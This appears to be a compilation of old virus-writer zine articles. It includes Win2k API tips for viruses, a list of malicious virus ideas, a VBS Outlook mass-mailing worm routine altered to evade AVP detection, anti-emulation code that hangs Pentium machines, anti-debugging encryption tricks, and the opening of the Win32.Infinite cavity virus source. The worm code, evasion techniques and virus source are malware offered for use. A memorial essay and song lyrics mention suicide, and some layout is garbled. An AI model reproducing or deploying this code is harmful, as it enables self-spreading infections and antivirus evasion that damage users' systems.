HANDLE hProcess // handle to process ); Easy. Now we can place some restrictions to the processes within the job but that's not so necessary for now. I promised terminating of all processes via one api fc rite? Here it is ... BOOL TerminateJobObject( HANDLE hJob, // handle to job UINT uExitCode // exit code ); After calling this function with rite job handle will be all processes within the job terminated.

4. Otherz - in Win2k Toolhelp32 library is implemented. You can again use fc as CreateToolhelp32Snapshot, Process32First etc. It is very usefull when writing for Win9x and Win2k a per(multi)-process residency. In WinNT you can use only EnumProcesses and EnumProcessModules from psapi until now.

These two functions weren't in Win9x so there were double code in viruses for both operating systems. - for easier access to registry you can use functions from Shell Light Weight API (shlwapi.dll). These functions are: SHDeleteEmptyKey SHDeleteKey SHDeleteValue SHGetValue SHSetValue SHQueryValueEx SHEnumKeyEx SHEnumValue SHQueryInfoKey SHRegGetBoolIUSValue e.g. to read a subkey, you had to open registry subkey, call RegQueryValueEx and then close the registry key. SHGetValue does everything in one step. - when you are infecting a file check it with SFCIsFileProtected which will tell you whether the file is protected or not. (I'm writing an article about how to fuck SFP and then it will be easier :)) - if you want to go to some system directories such as system32 etc. use fc ExpandEnvironmentStrings which let you use environment variables. E.g. until now you had to get windows directory and then paste system32. But now you just use %system32% environment variable which you pass to Expand ... that will return expanded path. DWORD ExpandEnvironmentStrings( LPCTSTR lpSrc, // string with environment variables LPTSTR lpDst, // string with expanded strings DWORD nSize // maximum characters in expanded string );

5. End I need rest !!! If you aren't crazy after reading this article then you are not normal :) For such people a little song: Settle for nothing A jail cell is freedom from the pain in my home Hatred passed on, passed on and passed on A world of violent rage But it's one that I can recognize Having never seen the color of my father's eyes Yes, I dwell in hell but it's a hell that i can grip I tried to grip my family But I sliped To escape from the pain and an existence mundane I gotta 9, a sign, a set and now I gotta name Read my writing on the wall No one's here to catch me when I fall But death is on my side Suicide!!!!!! Read my writing on the wall

No one's here to catch me when I fall Caught between my culture and the system Genocide!!!!!! Read my writing on the wall No one's here to catch me when I fall If ignorance is bliss Then knock the smile off my face If we don't take action now We settle for nothing later We'll settle for nothing now And we'll settle for nothing later Do you know who sings this? It's my beloved song from my beloved group. If you know name of that group tell it to me on #virus and you will get a prize. (well still dunno what the prize will look like but you will :)) And that's all for now ... If you'll find any errors just contact me pls. Thx for reading! Ratter ([email protected]) - I'm a stranger in the world i haven't made.

A few ideas for viruses Kalkin/EViL These are difficult times for us, virus writers. No, I don't mean the cops, society or the press. I mean the process of writing a virus. Yes, there are tons of materials about this subject and quite some people who can help, but that's usually by a technical problems. What if you want to do something radically new? It's actually not so easy coz everything has already been done: polymorphic macroviruses, ACCESS infection, LINUX-viruses. You can realize some parts of the virus in a never-seen-before way, but these parts are mainly only some solutions to some x technical problems. But you want to do something NEW and INTERESTING, something like the spying virus from CodeBreakers or the payload of CIH. Maybe this article will help you. .LNK and/or .PIF infection Maybe this has already been done, but I haven't heard about it (on the other hand, I'm not too informed about what goes on in the scene). Anyway, if it's so then the credit goes to the one who had this idea. Like you all know .LNKs are small link files, so called shortcuts, that were presented with Windows 95 (in Microsoft's OS world) and should eliminate the need to copy one program into several folders. .PIFs are basically the same, just they also contain usefull loading information and are for DOS programs. Both formats contain the path of the original program. It wouldn't be hard to replace this path with the path to our infected file, which would execute after it's actions the real program. This would be like some kind of companion virus. It would be even better, coz how many AV programs check for changes in .LNK/.PIF files? Another plus is that this infecting method basically works on every OS where are .LNKs (LINUX for example). The only problem is that a virus which uses just this method of infecting won't spread to any other computer (it will "travel" only if somebody for some x reason copys our file to another PC). But this method can be used to increase the change of executing the virus, especially in the case of runtime viruses. Alias "infection" This idea is based on the previous one and works on DOS (under 4DOS and NDOS) and *NIX systems (I think). A virus could set some aliases to itself and after infecting some files execute the original program. Name changing What if a DOS virus hooks INT 21h, saves and then changes the name (set by exec, found by findfirstfile) to the name of an infected file (in memory)? The infected file would be executed, copied to disk, included in a ZIP archive. If the proper code is included then this viralized item wouldn'd be opend for editing (the real one would). The same could do a WIN virus. And this method is better for spreading than the above two. Infection of format programs This idea was originally by MiKE The Hacker/TPT Gang and describes a hybrid virus, that infects formatting programs and modifies them so that they put the same virus on the bootsector of formatted disk. This would be better then just a bootsector-infector, coz you can't get rid of the virus by re-formatting the disk (atleast with this formatter). Reboot won't help eighter. This idea can be enhanced: infecting of CD writing programs, so that an AUTORUN.INF and an infected file would be written to CD. It should be a little bit easier (no need for a hybrid virus) and also better, coz there's no way you can get rid of the virus on CD (unless you're burning CD-RWs). Disadvanages: not too few formatting/CD-burning programs exist. Intel Pentium Pro fucking I came to this idea when I was surfing through Ralf Browns Interrupt List. There's written, that by using interrupt 15h and seting AX to D042h it's possible to install a microcode patch into the Pentium Pro processor. I haven't checked this and have no idea how much can the patch effect the CPU, so I don't know if the proper code will really fuck the processor

or will it do nothing. It's too bad that there aren't so many Pentium Pros around, coz there seems to be CIH potetial. "Collection" viruses This idea was inspired by GriYo/29A's SIMBIOSIS project. If you don't know what it is then: it outputted a polymorphing virus on an Internet worm that contained SMTP engine. A so called collection-virus is a virus (or worm) that contains several (let's say 5) viruses which will be released in a random order. "Part-upgrading" viruses Those viruses would have a "serial number" about every part of itself: the procedure of finding files, polymorphing engine, infecting part. When now such a virus would "meet" another part-upgrading-virus, it would check all serial numbers and if some of them are newer than it's own, it would copy the updated procedure to itself. But when it finds a part that it doesn't have then the virus would copy the part to itself and add a call or jump to it. So basically those viruses expand themselves. A direct action COM infector could for example add to itself parts to go TSR and infect EXEs. Quotating viruses It's a lame and not new idea. Such a virus would as payload display quotations of some famous person. For example Sokrates's. The good thing is that there are MANY people who have said something (I never said it should be something smart or meaningfull). Intro/demo viruses I don't mean here product demos, but graphics demos like they are presented on demo-parties and compos (check http://www.hornet.org to get the picture). Intro-viruses would play such videoeffects as payload. Advantages: usually small size, nice, different (what do you think, will people remember better a lame textmode "Infecto-ViruZ" in black and white or a "IntroVirus" in 24 bit colours companioned by breath-taking-beautiful moving clouds?) Simulating anti anti-virus viruses Most viruses today have retro abillities, but I'm talking about a virus, that is specially coded to destroy anti-virus programs. It would turn off resident AV monitors, install troyans in anti-viruses (*.AVC and TBSCAN.DEF infection). It would also overwrite part of AV programs by installing itself in them and then simulate that the AV scans. There are several viruses that patched the "File system" status on TbScan's output to hide the fact that it suddenly used DOS services to read the disk. A SAAV virus would for example execute the graphics procedure to display message "Scanning for known viruses in memory" by F-Prot/DOS but then just wait for some time. It would use the necessary procedure to bring up the scanning window, display filenames and instead of checking infect them. Or for example display "Checking partition table" by ThunderByte Partition (created by TbUtil) and check nothing. It could be like the real AIDS, which doesn't kill, it just destroys the immunity system and makes the way free for other deseases. It doesn't take much code to do so, just some small patches. The problem is how the virus finds what to patch coz AV companies would change the inner structure of the program with every new version. At this moment the fact, that most AV programs don't let to encrypt/compress themselves (coz of the CRC check), comes real handy. Simulating viruses Based on the above idea these viruses would install themselves in some specific programs and then simulate. One example could be PGP (so that the signature is always GOOD, and goodbye to trustfull software). It could also be one virus that patches several products. "Expensive" viruses It's actually a image of what happened here in Estonia: quite some Internet users recived a file called Estonia.Exe This was a SFX ZIP and contained a client program for some sex-server. Anyway, after executing the program did also some other things and as a result

the PC began to connect to Net through a Malaysian (if I remember correctly) server, which had quite high prices. Nobody knew it and everyone was REALLY surprised when in the end of the month the telephone bill was HUGE. There were talks that this was a virus, but most (including specialists) don't think so. It seems that it was just a troyan. But, this idea can be used in viruses (a good way to compromize the lamest ISP near you). Destroying the PC-speaker As last a destructive payload from KUTT/TPT Gang. The idea is based on the fact that speakers may get damaged when the music is too loud. KUTT though that it would be interesting if a virus did that to PC-speaker: generate a high and loud sound and play it quite some time. It's probably technically impossible to realize, but who knows? An enhanced version of this idea is to damage the speakers that are connected to the sound card. This should actually be more realistic, coz usually the hardware of a sound card is capable of that and the speakers aren't made for this situation.

The protector scene Kalkin/EViL There are many sub-cultures in the computer world: hackers, demo-coders, musicians, graphicans, virusauthors, crackers. And there's also a not so well knows scene: the protector-scene. It mostly consists of crackers. So what do these protector guys do? They research ways how to defeat debuggers/code analyzers/emulators/disassemblers and write programs that use these ways to protect COM and EXE files. Why am I telling this? Because there's been quite some talk about anti-byte techniques, the advantages of slow polymorphism and other ways to make the detecting and/or disinfecting of virus harder. But almost nothing has been said about anti-debug tricks, even if those are REALLY important. Already in number 4 (or was it number 6?) of 40hex was an article about ADcode. Samples there were for confusing the reading of code. But the methods have involved FAR beyond that. Nowadays the protecting part uses stack tricks to crash debuggers, changes between protected and real mode, checks memory, calculates checksums, debugs and emulates it self, relocates the code in memory, opens the original file and checks it for changes. The protectors contain polymorphic engines (I've seen all better known MTEs in them: TPE, ViCE, MtE, DAME, etc.). They have become really powerfull. But they still resemble to viruses: become executed first, do their stuff, clean up, execute the real program. Some of these protectors are REALLY hard to crack, even really good crackers have a problem with them. I come to the point now: what do you think, how many really good crackers are there among AVers? Sure, they know debuggers and dissemblers, but that's not enough to be a good cracker. What now if some hard AD code, so hard that even the best crackers have problems with it, has been used in your virus? Wouldn't the AVer, who gets a sample of it, have some sad times, sitting up all night and trying to decrypt the virii? But how can a viruswriter get this kind of code? For our luck, exactly like in viral business, there are many sourcecodes available. And there's also an another reason why to check protectors: quite a lot of them check the executable for changes. It's no problem when your virus is resident and has stealth capabillities, but if you coded a runtime virii then you're fucked. This can be changed by adding code that prevents the virii from infecting protected files. Ofcourse there's a third reason: use the encryption routines of a protector for crypting the virus. Or you can encrypt the file with this code and insert another decryptor, which decrypts your virii, into the main decryptor. The main coal is that AVP for example (seems to be the AV which can unpack the most executable compressors and decryptors) scans the file (finds no viral infection), finds the protector, unpacks it, scans the unprotected file (and finds again no virus). A (possilbly) good example of the code produced by the protector scene are EliCZ device drivers - ExDs. They are VxDs that are executed in DOS, work their way up to ring0 and stay there. Plus points: undetectable (or that's atleast what EliCZ claims). Why can't we use this technology in our virii? But check out the things yourself. You just need access to Internet and the following address: http://www.suddendischarge.com

Katja Kladnik (Lucky Lady) Richard Karsmakers "Make haste slowly." Suetonius, "Lives of the Ceasars" ST NEWS VOLUME 10 ISSUE 2 DEDICATION ARTICLE TO KATJA KLADNIK (R.I.P.) by Richard Karsmakers Some of you will maybe remember me mentioning a girl from Slovenia by the name of Lucky Lady that contacted me about 18 months ago for the first time. She has occurred in various installations of the ST NEWS virus column. As you may recall, she had decided to contact me in a reaction to my "Ultimate Virus Killer", which had in some way caused her to start a kind of 'competition' with her designing and spreading computer viruses and me trying to find and kill them. She sent me each of her creations so that I could update the "Ultimate Virus Killer" recognition algorithms. Although I certainly didnt't approve of all these things she did nor the way she involved me in it, all I could do was play along with the game. I couldn't contact her in return, because she always sent her packages anonymously. As 1994 was coming to its close, it became apparent that she had left the Atari community and was now concentrating more on the PC side of things. Also, quite suddenly she contacted me via electronic mail. Though I still didn't know her name, I could now at least send messages back to her. Especially with her having left the Atari virus creation scene, something happened which I had not considered possible: Our email messages became more casual and even personal. Gradually I found our that her real name was Katja Kladnik, who had lost her parents in the Yugoslavian war, though Slovenia was now no longer a war zone. She now lived with foster parents and studied pyschology at the University of Ljubljana, the capital of Slovenia. She was - I know this may sound strange to some of you, especially those struck by any of the viruses she has created - a really fascinating person who had a lot of hidden depths to her personality. We exchanged email messages with quite some regularity, usually involving topics like music, culture and, occasionally, viruses. I always wondered why she had found it so challenging to create computer viruses and start this semi- friendly "virus war" with me, a question that she could never really reply to satisfactorily. Around spring of this year I noticed her messages getting increasingly gloomy and depressing. She even said, at several occasions, that she wouldn't mind being dead or something. I never knew what triggered this doom and gloom, though it might have been her boyfriend leaving her some time earlier. There was nothing I could do about it, either. Believe me, I tried. When I emailed to her to ask how she was doing, somewhere around the middle of June, I got a message back after a while from someone else who said that, on June 3rd, 11:53 CET, Katja had died at Ljubljana's main hospital of an Atropine and Scopolamine overdose. Suicide, most likely. She was 22. Despite the fact that, in theory, Katja "Lucky Lady" Kladnik had started off as something like an enemy, in the course of our correspondence she had become a kind of friend. Especially after she had left the Atari scene, we opened up to each other and I no longer felt that being in contact with her was in some way morally incorrect what with my being a virus killer programmer and her a (by then ex-) Atari virus coder. During the last one or two months she was to me not a virus coder at all, but instead a sad young woman that needed attention and love badly. Katja, despite the fact that we started off on a really wrong foot, you will be on my mind always; not as a virus coder but as the enchanting and fascinating friend that you gradually became. This issue of ST NEWS is dedicated to the memory of Katja Kladnik.

Anti Avp Vbs I-Worms Detection. By [K]Alamar

In one of the last Updates, the Avp antivirus has added a detection for i-Worms that uses the Outlook replication method, used in almost all the Vbs and Js worms, Like the I Love you, Bubbleboy and all of them. Ok, this will made your I-worm undetectable for avp till they add it to the database; i'm pretty sure that if in your worm you use Outlook replication you use this code, or one similar: ---

Dim fso, ws Set fso = CreateObject("Scripting.filesystemobject") Set ws = CreateObject("WScript.Shell") Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count * Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "Your subject" msg.Body = "The body" msg.Attachments.Add "path to your Worm" msg.DeleteAfterSubmit = True If msg.To <> "" Then msg.Send End If Next End If Next end if ---

The only thing that you should do is add one line and change another, like here (lines with * are the modified ones): --Dim fso, ws Set fso = CreateObject("Scripting.filesystemobject") Set ws = CreateObject("WScript.Shell") Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then AddlistCount = AddList.AddressEntries.Count * For AddListCount = 1 To AddlistCount * Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "Your subject" msg.Body = "The body" msg.Attachments.Add "path to your Worm" msg.DeleteAfterSubmit = True If msg.To <> "" Then msg.Send End If Next End If

Next end if ---

You should delete the "*" if you want the worm to work. I think that if you know something about I-Worms you should understood what i did; i just create a new variable, AddlistCount , and make it be like the number of addressentries, and then i use that new variable in the next line. I hope you understood This. [K]Alamar - [email protected] Member Virii Argentina Http://www.virii.com.ar

--==< Retro the easy way. >==-By MidNyte, February 2000

What is a Retro-virus? ------------------------A Retro-virus is any virus that attacks antivirus programs, whether generically or just specific programs. It is generally used to disable or fool one or more of the popular antivirus programs. For instance, a certain virus will detect if a certain on-access scanner is in memory, and will issue the correct call to shut it down if it is. Another will patch the resident part of the scanner that decides whether to scan a file or not and makes it decide not to in all cases. These are very useful functions, but if you're not of the ability to be able to work out these methods for yourself, you are left with the choice of: leaving retro-functions out of your virus, using other peoples routines (which are therefor not new) or trying something different. That is what this tutorial is about, a few simple ideas that will give basic retro-functionality without the need to be too far advanced in coding. All you need is some basic anti-emulation skills.

What's the theory? --------------------So how do we get Retro without learning it all? Basically we find ways to annoy the user so much that he does the job of disabling the antivirus program for us. If we slow him down when he scans he will probably eventually only scan overnight, giving us a day to spread. If we make the program crash he probably won't bother scanning it again, he'll just add it to the ignore list. (It's not that uncommon to find a file that can't be scanned without crashing on a Microsoft machine :)

How do we implement it? -------------------------You remember reading that a good emulator will save it's place when it finds a decision-based jump? That way, if the code does a check of something and then quits if the condition is met, the emulator can just go back and pretend the condition wasn't met and see what it can find down the other branch of the program. This is to defeat the technique of quitting when finding an emulator. How about we stop that? How about we do our anti-emulation bit and then test it, but if we're being emulated instead of just quitting, we crash the program? Or better still, if we're on a pentium, why not just hang the machine? It's what the 'foof' bug is there for :) If the machine hangs, the antivirus program has no chance to return to the jump and try the other branch and the user will probably not bother scanning it again. If he does, the same thing will happen again and again, the user will never get a complete scan. Here's a rough guide to the code needed, assuming that you have in place a suitable emulation-detection routine:

cmp ax,028h ;our test for emulation je not_emulated ;jump if equal db 0F0h,00Fh,0C7h,0C8h ;this will hang most pentium machines, it's ;known as the 'foof bug' for obvious reasons.

not_emulated:

;here we are safe from the AV program

How many end users are going to restart the computer and try scanning that file again when the last time it hung the computer? In the Microsoft age of idiot-friendly operating systems, not many. If they don't know what's going on and the machine hangs, they just won't do it again. If they do once, they won't twice. Take the virus hoax emails that constantly do the rounds, most people know better to respond and forward the mail, but the fact that they carry on spreading shows just how many idiots there are out there who are capable (just about) of using a computer. These are the people who will not scan your file but simply add it to the ignore list, leaving it to go about it's business. Another method is the time wasted method. Again it's down to annoying the user so much they don't bother scanning. If you can go round enough loops when you find emulation that the scanner takes minutes just to scan one file, the scanner will probably only be run overnight and taken off constant background monitoring. That gives you a day to spread, and spread un-noticed.

Contact ---------Comments/questions/suggestions/bug reports/etc. are welcomed as always, as long as it is kept reasonable. - MidNyte

As always, I welcome ANY feedback, good or bad, as long as it is reasonable. |

[email protected] | www.coderz.org/midnyte | www.shadowvx.com/midnyte

|

--==< How to become the world's richest man >==-By MidNyte, June 1999 (Approx).

Microsoft are rumoured to have stated that they will use unlimited resources and funds to find the author of the VBS/Monopoly worm. The worm carries a message accusing Bill Gates of monopoly and includes a satirical picture of Bill Gates' head on the Waddingtons character featured on a monopoly board. This particular worm is much less of a security risk to the user than other viruses. Surely everyone can see this is a case of bruised millionaire's ego? Why does no-one point out to Bill that the worm spreads through the almost unbelievable lack of security that Microsoft products offer? Why not, Mr. Gates, use unlimited funds and resources to FIX your defective products? Why not, Trading Standards, make him make his product do what it claims to do, and while you're at it, make him either make it secure, or make him warn people of the security risk? This is the worlds richest man, who owns one of the worlds biggest companies, and that is how he got rich, by writing a half-product and managing to sell it for a huge price. Money that should have gone into making the products what they claimed to be went into Bill's back pocket instead. We now have proof in this retaliation to a simple worm that to Bill Gates, his ego is worth billions, his customers are not. The virus didn't prove your guilt Bill, it didn't need to. Your reaction leaves us in no doubt.

--==< An Introduction to Encryption, Part III >==-Is an impenetrable encryption possible?. By MidNyte, February 2000

A short (and over-simplified) history of the virus ----------------------------------------------------First of all came the un-encrypted virus. Then came virus scanners, which were basically just hex searchers looking for strings of hex only found in certain viruses. Viruses retaliated by coming up with encryption. Most of the virus is encrypted, and a small decryption engine at the start of the virus decrypts the virus body. As the encryption changes each time, the virus scanner is limited to searching for a much smaller section of code inside the constant decryptor. This wasn't much of a problem for virus scanners though. Viruses fought back again with polymorphism, this is essentially a way that a virus can change it's decryptor every time it infects a new file. That way no constant strings appear in the virus. Virus scanners came up with two ways to combat this, heuristics and emulation. Heuristics is simply looking for code that looks 'virus-like' This can be something as simple as the string '*.exe'. Emulation is the controlled running of the program instruction by instruction (not quite, but close enough for this article). A virus, under emulation, will be allowed to run just enough to decrypt itself and reveal it's code for either a straightforward scan or a generic (heuristic) scan. Anti-emulation is the viruses way of defeating this, it is a basically a way to detect emulation in progress and act accordingly. Some anti-emulation systems are incorporated into the decryptor of a virus, so that if the virus is being emulated it will not decrypt properly and hence not reveal it's code. Another defence the virus can use is anti-debugging, which is designed to hinder people who try to debug (in this case unencrypt) your code. This is different in that it doesn't defend the virus from antivirus programs, it defends it from the antivirus companies, the people who will try and study the virus and work out a way to detect it. Anti-debugging can be very simple, like turning off the keyboard interrupts at the start of the code and back on again at the end or it can be quite complicated, with the actual anti-debugging routine also being used as a key to decryption to protect against patching. This is the focus of this article.

Anti-debugging: more detail -----------------------------Anti-debugging tricks are basically little pieces of code that have no overall effect on the running of a virus when being run as normal, but that cause the virus to malfunction, crash or worse when they are run under a debugging environment. The simple example above was to turn of the keyboard interrupt at the start of the code, and turn it on again at the end of the virus before control is passed back to the host program. This is simply achieved with:

in al, 020h ; \ or al, 002h ; }Disable Keyboard interrupt out 020h, al ; / ...at the start, and: in

al, 020h ; \

and al, 0FDh ; }Enable keyboard interrupt (FDh = NOT 2) out 020h, al ; / ...at the end. When the virus is run under normal conditions, the keyboard is only off for a very small time, too small for people to notice. If the program is running under a debugger, as soon as the first few instructions are run the keyboard will no longer work, leaving the person at the debugger with no choice but to reset (at least it used to be in the good old days :) The simple work around for the person debugging was too simply patch over the code that turned off the keyboard with NOPs or other do-nothing instructions. Now the virus would work as normal under a debugger, without disabling the keyboard. To retaliate from this, the virus started to use it's anti-debugging routine as a key for decryption. The hex string to turn off the keyboard is 'E4 20 0C 02 E6 20'. If this was one of the decryption keys, the person debugging could not just replace the instructions with NOPs as this would change the key to '90 90 90 90 90 90' and cause the virus to decrypt incorrectly. This seems like an ideal solution, but unfortunately it is not. The whole point of this article is to point out the following fact: Any decryption routine can have it's basic functionality copied by someone determined to debug it. This means that your routine that uses an antidebugging routine and also uses that routine as a key for further decryption could be useless. Let's go through it with an example. The original virus looks like this:

start: in al, 020h ; \ or al, 002h ; }Disable Keyboard interrupt out 020h, al ; / xor si,si lea lea sub shr

bx, cx, cx, cx,

start_of_encrypted end_of_encrypted bx 001h

decrypt: mov ax, word ptr [start+si] xor [bx],ax inc si cmp si, offset decrypt jne next_key_word xor si,si next_key_word: loop decrypt The pointer to the relevant word of the decryption key is kept in si, and means that the key is all the code from 'start:' to 'decrypt:'. This works out as 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'. If the keyboard part was nopped out the key would change to '90 90 90 90 90 90 33 F6 BB 19 01 B9 36 01 2B CB D1 E9', as we've already seen. What the person doing the debugging could do though, is simply take the encrypted portion of the virus and put it into his own program, only this time the key would be stored as data, not as an executable part of the program, like this:

start: xor si,si lea bx, start_of_encrypted

lea cx, end_of_encrypted sub cx, bx shr cx, 001h decrypt: mov ax, word ptr [key+si] xor [bx],ax inc si cmp si, offset key_end jne next_key_word xor si,si next_key_word: loop decrypt key: db 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9' key_end: As you can see, the above will decrypt the encrypted section in exactly the same manner, only because the key is stored as data we can change the code as much as we like.

Is an impenetrable encryption possible? -----------------------------------------So then, is it possible to include enough current techniques, or to come up with a new technique to completely eliminate the chance of the antivirus programmers being able to decode it? Many people think that they have found a way to ensure that their program is completely impenetrable to decryption unless it is running at the time. This is, unfortunately, unachievable in theory. Because of the above demonstrated technique, any anti-debugging technique can be overcome by someone with enough time to debug a program by hand. This means that *any* anti-debug code you put into a virus can be got around eventually because the person debugging can always read what is going on in a hex editor and make a new routine to simulate it, hence the routine you write will not always be used to decrypt the code. They will only see one layer of decryption at a time, however, and this is the key to making in impenetrable encryption.

Conclusion ------------In the end then, we can never make it *impossible* for a researcher to decrypt a virus through programming tricks, however we can make it *impractical* through the use of scale, ie, we can use so many layers and different tricks that it is impractical to debug. If it takes a week for a programmer to decrypt a virus with hundreds of layers of encryption, they may be able to justify it. If they have ten viruses of this kind it gets harder to justify, and with a hundred of them it starts to get impractical. The ball would be back in their court.

Contact ----------

Comments/questions/suggestions/bug reports/etc. are welcomed as always, as long as it is kept reasonable. - MidNyte

As always, I welcome ANY feedback, good or bad, as long as it is reasonable. |

[email protected] | www.coderz.org/midnyte | www.shadowvx.com/midnyte

|

; ;ÄÄÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄ¿ ; ÚÄÜÜÜÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ [ Win32.Infinite Billy Belcebu/iKX ] ; ÀÄÛÛÛÄÛÛÛÛÛÛÄÄÄÛÛÛÛÛÄÄ¿ ÚÄÄÄÄÄÄ[ 1699 bytes Target - Win32 Ring3 ]ÄÄÄÄÄÄ ; ÚÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ ³ [ 17/07/00 - Made in Valencia, Spain ] ; ÀÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÄÄÙ ; ; ; ; [ Introduction ] ; ; Welcome to Infinite. This virus has been very rare for me, as its ambient ; of development was very odd. Well, it's my first virus using cavity tech, ; something that i thought that it was more difficult than it really was... ; I sincerely doubt that it would work in WinNT family (NT4,W2K), as i havent ; been able to test it there (Win2k has some incompatibilities with my ; 3DFX Voodoo2 and my soundcard), but i didn't wanted to change that thing of ; Win32. If it doesn't, i don't care... Blah blah blah, i've returned from my ; laaaarge VX holydays and i've just recently finished Forever and this babe. ; I hope i haven't lost my awesome code style (blah, just kidding... i don't ; have anything awesome besides the size of my dick - enormous) :) ; Oh, i almost forgot... I've realized that the cavity technique is stable ; most of the times, but it's not perfect, and i should do much more compro; bations before infection than the already existing ones, but i really don't ; care: Windows also has fails in its code and noone reminds it ;) ; It's not a special virus in any field, but i wanted to do some cavity stuff ; and here it is. Mwaha! ; ; [ Features ] ; ; + Cavity virus, searches for holes of zeroes or INT 3. ; + Infect files on current, WINDOWS and WINDOWS/SYSTEM directories. ; + Simple & silly 8-byte XOR encryption loop ; + Kinda simple EPO with emulator protection ; + Checks for SFC protection (if it works in Win2k...) ; + CRC32 usage (APIs, extensions...) ; + It's intended to be optimized (not too much, but enough) ; ; [ Greetings ] ; ; This time the greets will go to few ppl. From the VX scene, to StarZer0, ; Wintermute, VirusBuster, Benny, Asmodeus, LifeWire, Bumblebee, Ypsilon, ; and from outside to my best friends out there.Also to the people that tries ; to make this place we call world a much better place. You rule, guyz. ; ; [ Infinity - The song ] ; ; Mother watch your children ; The iron fist of fear is ruling our lives ; It's not too late to change the course ; We can make this world a better place to be in ; ; How much more do we want until we're satisfied? ; What happens when we have what we want? ; Acquiring more, still there's never enough ; We forget those who really are in need ; The end is near, or so they say ; Selling peace with guns ; ; Infinity - Where do we go from here? ; Infinity - Where do we go from here? ; Infinity - Where do we go? ; Infinity - Where do we go from here?

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

Guns spitting (out the) message of peace everywhere Is it really that we don't care? See mercenaries of fear selling love Telling salvation comes from above Arrogance and fear walking hand in hand We must see that there's much more to life than this Mother see your children Make us understand to and help us to find the way The answers lie inside They are locked inside to the vault of truth of us It's time to spread the word around Be yourself and do what you want to do with your life Remember, you get just what you give You reap all what you sow You are in charge of your own life Infinity Infinity Infinity Infinity

-

Where Where Where Where

do do do do

we we we we

go from here? go from here? go? go from here?

You make your own way -----------------------------------------Infinity - [ Stratovarius ] - ( Infinite ) (c) 2000 Billy Belcebu/iKX

[ http://beautifulpeople.cjb.net ]

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º Win32.Infinite (c) 2000 Billy Belcebu/iKX º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ include host.inc include infinite.inc virseg

; Some nice includes

segment dword use32 public 'infinite'

virus_start: ; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º Virus code º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ infinite: push pushad call encrypt_start call

eax

; Make some space on stack

decrypt = $ get_delta

call mov call jmp

SetSEH esp,[esp+08h] get_delta RestoreSEH

xor push mov

edx,edx dword ptr fs:[edx] dword ptr fs:[edx],esp

push

05h

; Set our new protection frame

SetSEH:

; ECX is the limit of pages

pop mov call mov

ecx esi,ebp ; We put a page inside our code CheckImageBase ; Get our own image base dword ptr [ebp+modbase-delta],esi

push pop mov call mov

05h ; 50 pages to scan ecx esi,[esp+2Ch] ; Put the candidate to kernel CheckImageBase ; Scan backwards for it dword ptr [ebp+kernel-delta],esi

lea xchg lea call

eax,[ebp+api_list-delta] eax,esi edi,[ebp+api_addresses-delta] GetAPIs

; Let's detect all the needed ; APIs :)

; Virus is now initialized, let's search for objectives. lea push push apicall

edi,[ebp+current_dir-delta] edi 7Fh GetCurrentDirectoryA

lea push push apicall call

edi,[ebp+infect_dir-delta] 7Fh edi GetWindowsDirectoryA SetDir&Infect

lea push push apicall call

edi,[ebp+infect_dir-delta] 7Fh edi GetSystemDirectoryA SetDir&Infect

lea push apicall call

edi,[ebp+current_dir-delta] edi SetCurrentDirectoryA Seek&Infect

; Save current directory to ; a temp variable

; Now let's unprotect the memory where the epo bytes will be restored

hh&l:

call dq push push mov add push apicall

hh&l ; Hunting high & low :) ? 04h ; PAGE_READWRITE epo_bytes eax,dword ptr [ebp+rethost-delta] eax,dword ptr [ebp+modbase-delta] eax VirtualProtect

; Now it's time to go away ;) RestoreSEH: xor pop pop

edx,edx dword ptr fs:[edx] edx

mov rethost equ add modbase equ

edi,(offset host-400000h) $-4 edi,12345678h $-4

; Restore the original SEH

sebes over0:

mov

[esp.20h],edi

call db pop push pop rep

over0 epo_bytes dup (90h) esi epo_bytes ecx movsb

